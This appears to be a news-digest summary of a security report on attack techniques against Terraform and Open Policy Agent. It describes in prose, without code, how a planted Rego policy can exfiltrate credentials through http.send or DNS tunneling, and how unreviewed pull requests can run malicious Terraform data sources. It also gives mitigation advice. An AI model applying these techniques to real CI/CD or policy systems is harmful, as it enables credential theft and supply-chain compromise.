New Attack Techniques Exploit Terraform and Open Policy Agent Vulnerabilities
2024-11-26
Need some FUD? Learn about the vulnerabilities in IaC and PaC tools like Terraform and OPA, and how they expose cloud platforms to new attack vectors.
The article discusses newly discovered attack techniques targeting Infrastructure-as-Code (IaC) and Policy-as-Code (PaC) tools like Terraform and Open Policy Agent (OPA). These tools, which utilize domain-specific languages, are typically seen as secure but have vulnerabilities that can be exploited. An attacker can compromise OPA by inserting malicious policies to exfiltrate data using functions like "http.send" or "net.lookup_ip_addr." Terraform is also vulnerable as attackers can manipulate GitHub workflows through unreviewed changes in pull requests, using malicious data sources to achieve their goals. The article emphasizes the need for using trusted third-party components to mitigate these risks.
Supply Chain, Git/Repo Breach, Weak or Compromised Credentials, Open Source
Terraform, Open Policy Agent, IaC vulnerabilities, PaC vulnerabilities, data exfiltration, DNS tunneling
N/A
Terraform, Open Policy Agent
Recent discoveries have unveiled new attack techniques against Infrastructure-as-Code (IaC) and Policy-as-Code (PaC) tools, notably HashiCorp's Terraform and Styra's Open Policy Agent (OPA). These tools, which use domain-specific languages (DSLs), are designed to be more secure than general programming languages, yet they are not impervious to attacks. OPA is an open-source policy engine that enforces policies in cloud-native environments, like microservices, CI/CD pipelines, and Kubernetes. It uses a query language called Rego for policy definitions. A new attack method involves compromising the supply chain by inserting a malicious Rego policy into an OPA server through unauthorized access. This malicious policy is then used during the policy decision-making process to enable harmful actions, such as credential exfiltration. This is achieved using the built-in "http.send" function. Even if "http.send" is restricted, attackers can exploit the "net.lookup_ip_addr" function to carry out DNS tunneling, allowing data exfiltration. Therefore, it is advisable to monitor and restrict these functions in OPA policies to mitigate such risks. Terraform simplifies cloud resource management through code-based configurations using its HashiCorp Configuration Language (HCL). Attackers can manipulate Terraform by exploiting its "terraform plan" command, which is often triggered as part of GitHub "pull_request" workflows. This allows unreviewed changes containing malicious data sources to be executed during the CI/CD process. Such vulnerabilities pose risks as external attackers in public repositories or malicious insiders in private repositories can exploit pull requests to achieve their objectives. These data sources may include rogue external data, Terraform modules from registries, or DNS data sources. It is crucial to ensure that only third-party components from trusted sources are used to prevent these exploits.New Attack Techniques Target IaC and PaC Tools
Vulnerabilities in Open Policy Agent (OPA)
Exploiting Terraform's IaC Platform
https://thehackernews.com/2024/11/cybersecurity-flaws-in-iac-and-pac.html?m=1